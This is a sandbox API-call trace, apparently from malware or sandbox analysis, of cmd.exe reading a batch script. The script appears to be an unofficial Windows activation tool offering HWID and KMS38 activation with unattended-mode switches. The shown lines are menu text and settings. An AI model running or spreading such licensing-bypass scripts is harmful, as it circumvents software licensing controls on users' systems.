returned 0x1 [0181.230] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.230] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_oem%\" | find /i \"KMS38\" 1>nul && (\r\n", cbMultiByte=44, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo \"%_oem%\" | find /i \"KMS38\" 1>nul && (\r\nsfully created on the Desktop.\"\r\n") returned 44 [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] GetFileType (hFile=0x9c) returned 0x1 [0181.230] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.230] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n_oem%\" | find /i \"KMS38\" 1>nul && (\r\n") returned 7 [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] GetFileType (hFile=0x9c) returned 0x1 [0181.230] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.230] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo To KMS38 activate Server Cor/Acor editions ^(No GUI Versions^),\r\n", cbMultiByte=70, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo To KMS38 activate Server Cor/Acor editions ^(No GUI Versions^),\r\ntop.\"\r\n") returned 70 [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] GetFileType (hFile=0x9c) returned 0x1 [0181.231] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.231] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Check this page %mas%oem-folder\r\n", cbMultiByte=38, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Check this page %mas%oem-folder\r\n editions ^(No GUI Versions^),\r\n") returned 38 [0181.231] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.231] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.231] GetFileType (hFile=0x9c) returned 0x1 [0181.231] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.231] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no Check this page %mas%oem-folder\r\n") returned 3 [0181.231] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.231] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.231] GetFileType (hFile=0x9c) returned 0x1 [0181.231] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.231] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ___________________________________________________________________\r\n", cbMultiByte=74, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo ___________________________________________________________________\r\n\"\r\n") returned 74 [0181.231] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.231] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.231] GetFileType (hFile=0x9c) returned 0x1 [0181.231] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.231] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n_________________________________________________________________\r\n") returned 7 [0181.231] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.231] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.231] GetFileType (hFile=0x9c) returned 0x1 [0181.231] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.231] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n", cbMultiByte=54, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n__________________\r\n") returned 54 [0181.232] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.232] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.232] GetFileType (hFile=0x9c) returned 0x1 [0181.232] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.232] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="pause >nul\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="pause >nul\r\n %_Yellow% \"Press any key to go back...\"\r\n") returned 12 [0181.232] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.232] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.232] GetFileType (hFile=0x9c) returned 0x1 [0181.232] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.234] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto Extras\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto Extras\r\n%_Yellow% \"Press any key to go back...\"\r\n") returned 13 [0181.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.234] GetFileType (hFile=0x9c) returned 0x1 [0181.234] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.234] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nto Extras\r\n") returned 2 [0181.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.234] GetFileType (hFile=0x9c) returned 0x1 [0181.234] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.234] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n") returned 140 [0181.234] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.234] GetFileType (hFile=0x9c) returned 0x1 [0181.234] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.234] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n") returned 2 [0181.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.234] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.234] GetFileType (hFile=0x9c) returned 0x1 [0181.235] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.235] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":HWIDActivation\r\n", cbMultiByte=17, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":HWIDActivation\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n") returned 17 [0181.235] _wcsicmp (_String1="_color2", _String2="HWIDActivation") returned -9 [0181.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.235] GetFileType (hFile=0x9c) returned 0x1 [0181.235] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.235] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@setlocal DisableDelayedExpansion\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="@setlocal DisableDelayedExpansion\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n") returned 35 [0181.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.235] GetFileType (hFile=0x9c) returned 0x1 [0181.235] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.235] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@echo off\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nisableDelayedExpansion\r\n") returned 11 [0181.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.235] GetFileType (hFile=0x9c) returned 0x1 [0181.235] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.235] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0181.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.235] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.235] GetFileType (hFile=0x9c) returned 0x1 [0181.235] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.235] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: To activate, run the script with \"/HWID\" parameter or change 0 to 1 in below line\r\n", cbMultiByte=87, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: To activate, run the script with \"/HWID\" parameter or change 0 to 1 in below line\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++\r\n") returned 87 [0181.236] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.236] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.236] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.236] GetFileType (hFile=0x9c) returned 0x1 [0181.236] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.236] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _act=0\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _act=0\r\nate, run the script with \"/HWID\" parameter or change 0 to 1 in below line\r\n") returned 12 [0181.236] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.236] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.236] GetFileType (hFile=0x9c) returned 0x1 [0181.236] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.236] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _act=0\r\n") returned 2 [0181.236] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.236] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.236] GetFileType (hFile=0x9c) returned 0x1 [0181.236] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.236] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: To disable changing edition if current edition doesn't support HWID activation, change the value to 1 from 0 or run the script with \"/HWID-NoEditionChange\" parameter\r\n", cbMultiByte=171, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: To disable changing edition if current edition doesn't support HWID activation, change the value to 1 from 0 or run the script with \"/HWID-NoEditionChange\" parameter\r\n%% {echo ('GracePeriodRemaining='+$_)}\" 2^>nul') do call set \"gpr=%%#\"\r\n") returned 171 [0181.236] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.236] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.236] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.236] GetFileType (hFile=0x9c) returned 0x1 [0181.236] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.236] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _NoEditionChange=0\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _NoEditionChange=0\r\nedition if current edition doesn't support HWID activation, change the value to 1 from 0 or run the script with \"/HWID-NoEditionChange\" parameter\r\n") returned 24 [0181.237] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.237] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.237] GetFileType (hFile=0x9c) returned 0x1 [0181.237] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.237] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _NoEditionChange=0\r\n") returned 2 [0181.237] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.237] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.237] GetFileType (hFile=0x9c) returned 0x1 [0181.237] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.237] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: If value is changed in above lines or parameter is used then script will run in unattended mode\r\n", cbMultiByte=101, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: If value is changed in above lines or parameter is used then script will run in unattended mode\r\nto 1 from 0 or run the script with \"/HWID-NoEditionChange\" parameter\r\n") returned 101 [0181.237] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.237] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.237] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.237] GetFileType (hFile=0x9c) returned 0x1 [0181.237] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.238] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n If value is changed in above lines or parameter is used then script will run in unattended mode\r\n") returned 2 [0181.238] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.238] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.238] GetFileType (hFile=0x9c) returned 0x1 [0181.238] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.238] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\nID-NoEditionChange\" parameter\r\n") returned 140 [0181.238] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.238] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.238] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.238] GetFileType (hFile=0x9c) returned 0x1 [0181.238] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.238] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0181.238] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.238] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.238] GetFileType (hFile=0x9c) returned 0x1 [0181.238] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.238] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\n=====================================================================================================================================\r\n") returned 5 [0181.238] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.238] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.238] GetFileType (hFile=0x9c) returned 0x1 [0181.238] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.238] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="color 07\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="color 07\r\n================================================================================================================================\r\n") returned 10 [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] GetFileType (hFile=0x9c) returned 0x1 [0181.239] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.239] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title HWID Activation %masver%\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="title HWID Activation %masver%\r\n=========================================================================================================\r\n") returned 33 [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] GetFileType (hFile=0x9c) returned 0x1 [0181.239] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.239] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\ntle HWID Activation %masver%\r\n") returned 2 [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] GetFileType (hFile=0x9c) returned 0x1 [0181.239] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.239] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _args=\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _args=\r\nActivation %masver%\r\n") returned 12 [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] GetFileType (hFile=0x9c) returned 0x1 [0181.239] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.239] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _elev=\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _elev=\r\n") returned 12 [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.239] GetFileType (hFile=0x9c) returned 0x1 [0181.240] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.240] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _unattended=0\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _unattended=0\r\nion %masver%\r\n") returned 19 [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] GetFileType (hFile=0x9c) returned 0x1 [0181.240] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.240] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _unattended=0\r\n") returned 2 [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] GetFileType (hFile=0x9c) returned 0x1 [0181.240] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.240] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _args=%*\r\n", cbMultiByte=14, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _args=%*\r\nd=0\r\n") returned 14 [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] GetFileType (hFile=0x9c) 